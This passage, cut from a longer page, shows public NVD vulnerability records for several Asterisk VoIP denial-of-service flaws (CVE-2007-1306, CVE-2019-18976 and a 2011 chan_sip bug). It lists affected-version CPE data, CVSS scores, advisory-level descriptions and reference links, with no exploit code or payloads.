              "matchCriteriaId": "4F06C361-D7DF-474B-A835-BA8886C11A80",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "175954A5-E712-41B8-BC11-4F999343063D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "1DF9E41E-8FE6-4396-A5D4-D4568600FE03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "4457486F-E9B4-46B8-A05D-3B32F8B639A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "69417F54-D92F-46FB-9BFA-995211279C0E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "4611BEA0-25EC-4705-A390-6DF678373FF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "53022458-F443-4402-AC52-FC3AE810E89E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "120B85AA-E9B8-4A4D-81CE-FD36CDB63074",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FAB63F-B9F8-4D39-AEE9-BC0E54BAA944",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.2_beta2:*:*:*:*:*:*:*",
              "matchCriteriaId": "1BC20315-40B5-4DA1-AC49-E911C03AEA6B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6E56DB29-571D-4615-B347-38CF4590E463",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0_beta1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6B909947-44E3-463E-9FAD-76C8E21A54E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.0_beta2:*:*:*:*:*:*:*",
              "matchCriteriaId": "1FB2F8AA-B70B-4280-BDBD-023037C16D70",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Asterisk 1.4 before 1.4.1 and 1.2 before 1.2.16 allows remote attackers to cause a denial of service (crash) by sending a Session Initiation Protocol (SIP) packet without a URI and SIP-version header, which results in a NULL pointer dereference."
    },
    {
      "lang": "es",
      "value": "Asterisk versiones 1.4 anteriores a 1.4.1 y versiones 1.2 anteriores a 1.2.16, permite a atacantes remotos causar una denegaci\u00f3n de servicio (bloqueo) enviando un paquete de Session Initiation Protocol (SIP) sin una URI y Encabezado SIP-version, lo que resulta en una desreferencia del puntero NULL."
    }
  ],
  "evaluatorComment": "Per: http://cwe.mitre.org/data/definitions/476.html \r\n\u0027CWE-476: NULL Pointer Dereference\u0027",
  "id": "CVE-2007-1306",
  "lastModified": "2024-11-21T00:28:00.450",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2007-03-07T00:19:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://asterisk.org/node/48319"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://asterisk.org/node/48320"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://labs.musecurity.com/advisories/MU-200703-01.txt"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/24380"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/24578"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25582"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://security.gentoo.org/glsa/glsa-200703-14.xml"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2007/dsa-1358"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/228032"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.novell.com/linux/security/advisories/2007_34_asterisk.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/33888"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/22838"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securitytracker.com/id?1017723"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/0830"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32830"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://asterisk.org/node/48319"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://asterisk.org/node/48320"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://labs.musecurity.com/advisories/MU-200703-01.txt"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/24380"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/24578"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/25582"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://security.gentoo.org/glsa/glsa-200703-14.xml"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2007/dsa-1358"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "US Government Resource"
      ],
      "url": "http://www.kb.cert.org/vuls/id/228032"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.novell.com/linux/security/advisories/2007_34_asterisk.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/33888"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/22838"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1017723"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2007/0830"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32830"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2019-11-22 17:15

Modified

2024-11-21 04:33

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2019-008.html	Vendor Advisory
cve@mitre.org	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	Mailing List, Third Party Advisory
cve@mitre.org	https://packetstormsecurity.com/files/155436/Asterisk-Project-Security-Advisory-AST-2019-008.html	Third Party Advisory, VDB Entry
cve@mitre.org	https://seclists.org/fulldisclosure/2019/Nov/20	Mailing List, Third Party Advisory
cve@mitre.org	https://www.asterisk.org/downloads/security-advisories	Vendor Advisory
cve@mitre.org	https://www.cybersecurity-help.cz/vdb/SB2019112218?affChecked=1	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2019-008.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://packetstormsecurity.com/files/155436/Asterisk-Project-Security-Advisory-AST-2019-008.html	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://seclists.org/fulldisclosure/2019/Nov/20	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.asterisk.org/downloads/security-advisories	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.cybersecurity-help.cz/vdb/SB2019112218?affChecked=1	Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
digium	certified_asterisk	13.21
debian	debian_linux	9.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE39000C-238B-45D9-A2C0-9907A7FB4C36",
              "versionEndIncluding": "13.29.1",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F9D13EC-820A-4D7E-9AB1-F81DCFF324DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "B7EE2BD3-51DC-4DA5-A5F2-6275F5277BE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6A7B650A-4785-4A8B-BCB6-1B630A0E18E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "6B791DBB-EB45-4E9C-9C57-249D196EC0E5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.21:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "BF36760E-856B-4D74-98BF-129323E9306B",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in res_pjsip_t38.c in Sangoma Asterisk through 13.x and Certified Asterisk through 13.21-x. If it receives a re-invite initiating T.38 faxing and has a port of 0 and no c line in the SDP, a NULL pointer dereference and crash will occur. This is different from CVE-2019-18940."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en el archivo res_pjsip_t38.c en Sangoma Asterisk versiones hasta 13.x y Certified Asterisk versiones hasta 13.21-x. Si recibe una nueva invitaci\u00f3n para iniciar el env\u00edo de faxes T.38 y tiene un puerto de 0 y sin l\u00ednea c en el SDP, se producir\u00e1 una desreferencia del puntero NULL y un bloqueo. Esto es diferente de CVE-2019-18940."
    }
  ],
  "id": "CVE-2019-18976",
  "lastModified": "2024-11-21T04:33:55.320",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2019-11-22T17:15:11.833",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-008.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/155436/Asterisk-Project-Security-Advisory-AST-2019-008.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2019/Nov/20"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.asterisk.org/downloads/security-advisories"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.cybersecurity-help.cz/vdb/SB2019112218?affChecked=1"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2019-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://packetstormsecurity.com/files/155436/Asterisk-Project-Security-Advisory-AST-2019-008.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://seclists.org/fulldisclosure/2019/Nov/20"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.asterisk.org/downloads/security-advisories"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://www.cybersecurity-help.cz/vdb/SB2019112218?affChecked=1"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-476"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2011-07-06 19:55

Modified

2024-11-21 01:28

Severity ?

Summary

chan_sip.c in the SIP channel driver in Asterisk Open Source 1.6.x before 1.6.2.18.1 and 1.8.x before 1.8.4.3 does not properly handle '\0' characters in SIP packets, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted packet.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-008.diff	Patch
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2011-008.html	Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html
cve@mitre.org	http://secunia.com/advisories/45048	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/45201
cve@mitre.org	http://secunia.com/advisories/45239
cve@mitre.org	http://securitytracker.com/id?1025706
cve@mitre.org	http://www.debian.org/security/2011/dsa-2276
cve@mitre.org	http://www.osvdb.org/73307
cve@mitre.org	http://www.securityfocus.com/bid/48431
cve@mitre.org	https://exchange.xforce.ibmcloud.com/vulnerabilities/68203
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-008.diff	Patch
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2011-008.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/45048	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/45201
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/45239
af854a3a-2127-422b-91ae-364da2661108	http://securitytracker.com/id?1025706
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2011/dsa-2276
af854a3a-2127-422b-91ae-364da2661108	http://www.osvdb.org/73307
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/48431
af854a3a-2127-422b-91ae-364da2661108	https://exchange.xforce.ibmcloud.com/vulnerabilities/68203

Impacted products

Vendor	Product	Version
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0
digium	asterisk	1.6.0.1
digium	asterisk	1.6.0.2
digium	asterisk	1.6.0.3
digium	asterisk	1.6.0.3
digium	asterisk	1.6.0.4
digium	asterisk	1.6.0.5
digium	asterisk	1.6.0.6
digium	asterisk	1.6.0.7
digium	asterisk	1.6.0.8
digium	asterisk	1.6.0.9
digium	asterisk	1.6.0.10
digium	asterisk	1.6.0.11
digium	asterisk	1.6.0.11
digium	asterisk	1.6.0.11
digium	asterisk	1.6.0.12
digium	asterisk	1.6.0.13
digium	asterisk	1.6.0.14
digium	asterisk	1.6.0.14
digium	asterisk	1.6.0.15
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.16
digium	asterisk	1.6.0.17
digium	asterisk	1.6.0.18
digium	asterisk	1.6.0.18
digium	asterisk	1.6.0.18
digium	asterisk	1.6.0.18
digium	asterisk	1.6.0.19
digium	asterisk	1.6.0.20
digium	asterisk	1.6.0.21
digium	asterisk	1.6.0.21
digium	asterisk	1.6.0.22
digium	asterisk	1.6.0.23
digium	asterisk	1.6.0.24
digium	asterisk	1.6.0.25
digium	asterisk	1.6.0.26
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.0
digium	asterisk	1.6.1.1
digium	asterisk	1.6.1.2
digium	asterisk	1.6.1.3
digium	asterisk	1.6.1.4
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.5
digium	asterisk	1.6.1.6
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.7
digium	asterisk	1.6.1.8
digium	asterisk	1.6.1.9
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.10
digium	asterisk	1.6.1.11
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.12
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.13
digium	asterisk	1.6.1.14
digium	asterisk	1.6.1.15
digium	asterisk	1.6.1.16
digium	asterisk	1.6.1.17
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.18
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.19
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.20
digium	asterisk	1.6.1.21
digium	asterisk	1.6.1.22
digium	asterisk	1.6.1.23
digium	asterisk	1.6.1.24
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.0
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.1
digium	asterisk	1.6.2.2
digium	asterisk	1.6.2.3
digium	asterisk	1.6.2.4
digium	asterisk	1.6.2.5
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.6
digium	asterisk	1.6.2.15
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16
digium	asterisk	1.6.2.16.1
digium	asterisk	1.6.2.16.2
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17
digium	asterisk	1.6.2.17.1
digium	asterisk	1.6.2.17.2
digium	asterisk	1.6.2.17.3
digium	asterisk	1.6.2.18
digium	asterisk	1.6.2.18
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8374B5D-DE7A-4C3C-A5FE-579B17006A54",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "C7494CE2-D3CC-404D-BE61-09A2E1FB3E47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "06E48482-D9AF-4038-80DA-27D9B4907C0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "9BC3C441-290F-471A-BA19-6B1C4D72A670",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "632ED295-B67D-43CF-BF38-CCE04088BA08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "50F3835F-6F2B-4EA7-B111-3B3C26548BC1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta6:*:*:*:*:*:*",
              "matchCriteriaId": "0DCF7BD2-7903-4DC5-ADDC-EFCDC58736C5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta7:*:*:*:*:*:*",
              "matchCriteriaId": "E5BECFE0-286F-4DA1-8CA9-6CEE861C3012",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta7.1:*:*:*:*:*:*",
              "matchCriteriaId": "AFFF3245-2D0F-46E3-A1D6-319086489DC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta8:*:*:*:*:*:*",
              "matchCriteriaId": "C91F2524-99D1-4C4B-9A31-21C0FB8B4D5F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:beta9:*:*:*:*:*:*",
              "matchCriteriaId": "7B1BC0FF-9DB6-4FCC-A845-053943CF0D24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "419D4D16-E790-4872-B9AF-1320978768C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "73D30BA6-1EE0-4C3F-8F69-65C698A1B9A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D39FA25D-AB56-470D-94AB-14446DB7D475",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4225252F-5960-4A42-A575-00C125860E89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A65D76A8-BBDD-4BDE-B789-D745C400DCBE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A8B0F5A5-4252-4A9C-B830-2419E87AE5A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F9085056-3BE9-4309-9601-9CA0569BC215",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.4:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D8432455-9064-479F-B060-BF2A74ECC3EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E8EF2D7-371B-4268-989E-25225CC1F7B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABAC4CE9-1CFA-4279-B0CE-18F3C6FB9AB3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "E16E37A0-F739-4EEE-A1BB-EBC558C62767",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "DF0E2562-D0FC-404C-B725-617AEEF20AB8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "C831EC2A-C99D-4FB1-8E5C-2FF685792F2B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "F37C4158-6C4E-448D-929B-288480748289",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "6BBA9D27-E3DC-45CE-B56B-2C6781AA6A16",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.11:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "14CD1CCD-DFF2-4813-B56F-EA1C78AA818E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.11:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4499411B-C92E-47F3-A6F2-8C9011B1CBCC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.0.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FBC113E-6304-4605-B024-D6D7A264DC9D",
              "vulnerable": true
            },
            {
